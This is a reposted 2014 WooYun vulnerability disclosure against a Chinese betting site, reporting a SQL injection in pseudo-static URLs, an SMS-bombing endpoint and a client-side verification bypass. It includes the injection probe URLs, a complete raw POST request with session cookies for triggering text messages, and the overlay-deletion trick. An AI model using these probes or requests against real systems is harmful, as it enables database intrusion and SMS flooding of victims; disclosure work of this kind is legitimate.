投注网伪静态sql注入、短信轰炸、前端绕过

2015年5月27日05:43:47评论304 views字数 204阅读0分40秒阅读模式

摘要

2014-08-21：细节已通知厂商并且等待厂商处理中
2014-08-21：厂商已经确认，细节仅向厂商公开
2014-08-31：细节向核心白帽子及相关领域专家公开
2014-09-10：细节向普通白帽子公开
2014-09-20：细节向实习白帽子公开
2014-10-05：细节向公众公开

漏洞概要关注数(8) 关注此漏洞

缺陷编号： WooYun-2014-73215

漏洞标题：投注网伪静态sql注入、短信轰炸、前端绕过

漏洞作者：路人甲

提交时间： 2014-08-21 10:50

公开时间： 2014-10-05 10:50

漏洞类型： SQL注射漏洞

危害等级：低

自评Rank： 3

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： Mysql

0人收藏

漏洞详情

披露状态：

简要描述：

投注网伪静态sql注入、短信轰炸、前端绕过

详细说明：

1、sql注入：80 8080 8888端口均有此问题

以80端口的一个链接为例

http://goucai.touzhu.cn/actinfo/news_39692.html

http://goucai.touzhu.cn/actinfo/news_39692 and 1=1.html

http://goucai.touzhu.cn/actinfo/news_39692 and 1=2.html

2.短信轰炸

只以一个发短信接口为例，其他可能还有，需要自查。

code 区域

POST /customer/AllUserCheck.php HTTP/1.1
 Host: goucai.touzhu.cn
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
 Accept: */*
 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: http://goucai.touzhu.cn/customer/usersafe.php?usercz=5
 Content-Length: 86
 Cookie: PHPSESSID=ec00834031229b68214238f4227e66db; bdshare_firstime=1408523278454; helpskaiguan=CaiSo; JSESSIONID=451A224458AEA552813A284CF63807D2; Hm_lvt_bd0a40a63edb615722f22f4239f42596=1408523821; Hm_lpvt_bd0a40a63edb615722f22f4239f42596=1408524201; Hm_lvt_1960c483f4fc5ef584a135a1bf5419bf=1408524211; Hm_lpvt_1960c483f4fc5ef584a135a1bf5419bf=1408524238
 Connection: keep-alive
 Pragma: no-cache
 Cache-Control: no-cache
 
 jq_input_mobile=13812345678&actionc=newSendMobileCheckCode&suijishu=0.9894352478371744

3.div浮层绕过

http://goucai.touzhu.cn/customer/toUserEmail.php 修改验证邮箱，没实名认证会弹div浮层。

审查元素，删除<div style="display:block" id="pzzceng"></div>，可绕过限制

漏洞证明：

1、sql注入：80 8080 8888端口均有此问题

以80端口的一个链接为例

http://goucai.touzhu.cn/actinfo/news_39692.html

http://goucai.touzhu.cn/actinfo/news_39692 and 1=1.html

http://goucai.touzhu.cn/actinfo/news_39692 and 1=2.html

2.短信轰炸

只以一个发短信接口为例，其他可能还有，需要自查。

code 区域

POST /customer/AllUserCheck.php HTTP/1.1
 Host: goucai.touzhu.cn
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
 Accept: */*
 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: http://goucai.touzhu.cn/customer/usersafe.php?usercz=5
 Content-Length: 86
 Cookie: PHPSESSID=ec00834031229b68214238f4227e66db; bdshare_firstime=1408523278454; helpskaiguan=CaiSo; JSESSIONID=451A224458AEA552813A284CF63807D2; Hm_lvt_bd0a40a63edb615722f22f4239f42596=1408523821; Hm_lpvt_bd0a40a63edb615722f22f4239f42596=1408524201; Hm_lvt_1960c483f4fc5ef584a135a1bf5419bf=1408524211; Hm_lpvt_1960c483f4fc5ef584a135a1bf5419bf=1408524238
 Connection: keep-alive
 Pragma: no-cache
 Cache-Control: no-cache
 
 jq_input_mobile=13812345678&actionc=newSendMobileCheckCode&suijishu=0.9894352478371744

3.div浮层绕过

http://goucai.touzhu.cn/customer/toUserEmail.php 修改验证邮箱，没实名认证会弹div浮层。

审查元素，删除<div style="display:block" id="pzzceng"></div>，可绕过限制

修复方案：

修复吧

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-08-21 10:55

厂商回复：

十分感谢.大牛的关注.已经安排技术处理.

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-08-21 10:50 | 大亮 ( 普通白帽子 | Rank:386 漏洞数:73 | 小段子手)

0

路人甲什么的都碉堡了啊

1# 回复此人

漏洞概要 关注数(8) 关注此漏洞

缺陷编号： WooYun-2014-73215

漏洞标题： 投注网伪静态sql注入、短信轰炸、前端绕过

相关厂商： 投注网

漏洞作者： 路人甲